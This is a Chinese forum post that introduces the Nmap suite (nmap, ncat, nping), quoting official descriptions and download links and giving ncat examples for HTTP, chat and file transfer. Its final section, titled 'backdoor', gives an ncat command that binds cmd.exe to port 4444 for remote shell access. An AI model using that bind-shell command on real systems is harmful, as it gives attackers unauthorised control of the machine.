找回密码
 立即注册→加入我们

QQ登录

只需一步,快速开始

搜索
热搜: 下载 VB C 实现 编写
查看: 3070|回复: 0

nmap网络三剑客

[复制链接]

307

主题

228

回帖

7317

积分

用户组: 真·技术宅

UID
2
精华
76
威望
291 点
宅币
5567 个
贡献
253 次
宅之契约
0 份
在线时间
945 小时
注册时间
2014-1-25
发表于 2016-6-12 20:18:26 | 显示全部楼层 |阅读模式

欢迎访问技术宅的结界,请注册或者登录吧。

您需要 登录 才可以下载或查看,没有账号?立即注册→加入我们

×
本帖最后由 元始天尊 于 2016-6-13 15:40 编辑

官网https://nmap.org/download.html
套件下载地址:https://nmap.org/dist/nmap-7.12-setup.exe        https://nmap.org/dist/nmap-7.12.tar.bz2
nmap:开源网络端口扫描工具,可以根据各种特征判断目标系统、软件、服务、防火墙等信息,详细文档整理成doc
Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Nmap is ...
   •Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
•Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
•Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
•Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
•Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
•Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
•Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
•Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
•Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.



ncat:开源网络数据调试工具,操作原始网络数据
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

Among Ncat’s vast number of features there is the ability to chain Ncats together, redirect both TCP and UDP ports to other sites, SSL support, and proxy connections via SOCKS4 or HTTP (CONNECT method) proxies (with optional proxy authentication as well). Some general principles apply to most applications and thus give you the capability of instantly adding networking support to software that would normally never support it.

Ncat is integrated with Nmap and is available in the standard Nmap download packages (including source code and Linux, Windows, and Mac binaries) available from the Nmap download page. You can also find it in our SVN source code repository.

Many users have asked for a statically compiled version of ncat.exe that they can just drop on a Windows system and use without having to run any installer or copy over extra library files. We have built a statically compiled Windows binary version of Ncat 5.59BETA1. You can download it inside a zip file here. To ensure the file hasn't been tampered with, you can check the cryptographic signatures. If you need a portable version of a newer Ncat release, see the Ncat portable compilation instructions.

The Ncat Users' Guide contains full documentation including many tips, tricks, and practical real-life examples! There is also an Ncat man page for a quick usage summary.



nping:开源网络包生成、分析工具,可以生成各种协议的数据包
       
Nping is an open source tool for network packet generation, response analysis and response time measurement. Nping can generate network packets for a wide range of protocols, allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts, it can also be used as a raw packet generator for network stack stress testing, ARP poisoning, Denial of Service attacks, route tracing, etc. Nping's novel echo mode lets users see how packets change in transit between the source and destination hosts. That's a great way to understand firewall rules, detect packet corruption, and more.

Nping has a very flexible and powerful command-line interface that grants users full control over generated packets. Nping's features include:
•Custom TCP, UDP, ICMP and ARP packet generation.
•Support for multiple target host specification.
•Support for multiple target port specification.
•Unprivileged modes for non-root users.
•Echo mode for advanced troubleshooting and discovery.
•Support for Ethernet frame generation.
•Support for IPv6 (currently experimental).
•Runs on Linux, Mac OS and MS Windows.
•Route tracing capabilities.
•Highly customizable.
•Free and open-source.

nmap.part1.rar (1.8 MB, 下载次数: 1) nmap.part2.rar (1.28 MB, 下载次数: 1)

作为HTTP客户端:
        ncat –C www.baidu.com 80
        GET /index.php HTTP/1.0
        收到
        HTTP/1.1 302 Moved Temporarily
        Date: Sun, 12 Jun 2016 09:03:06 GMT
        Content-Type: text/html
        Content-Length: 215
        Connection: Keep-Alive
        Location: http://www.baidu.com/search/error.html
        Server: BWS/1.1
        X-UA-Compatible: IE=Edge,chrome=1
        BDPAGETYPE: 3
        Set-Cookie: BDSVRTM=0; path=/
       
作为HTTP服务器:
        ncat -l 80
        浏览器进入127.0.0.1
        收到
        GET / HTTP/1.1
        Accept: text/html, application/xhtml+xml, */*
        Accept-Language: zh-CN
        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
        Accept-Encoding: gzip, deflate
        Host: 127.0.0.1
        DNT: 1
        Connection: Keep-Alive
       
Vmware Linux和Host Windows通信:
        获取各自IP,并相互ping通
        linux ifconfig=192.168.21.165
        windows ipconfig=172.20.110.21
        在某一方建立服务器,另一方建立客户端
        Linux ncat -l
        Windows ncat 192.168.21.165
        连接后测试互发消息,成功即可
       

文件传输
        客户端发给服务器
        Host2        ncat –l > outputfile
        Host1        ncat –send-only host2 < inputfile
        服务器发给客户端
        Host1        ncat –l –send-only < inputfile
        Host2        ncat host1 > outputfile

端口转发       
        服务器        ncat –l 127.0.0.1 123
        客户端       

后门
        ncat -p 4444 -e cmd.exe                        在建立连接后将和cmd.exe交互
        ncat ipaddress 4444                        使用远程cmd.exe
回复

使用道具 举报

QQ|Archiver|小黑屋|技术宅的结界 ( 滇ICP备16008837号 )|网站地图

GMT+8, 2024-3-28 18:14 , Processed in 0.045475 second(s), 35 queries , Gzip On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表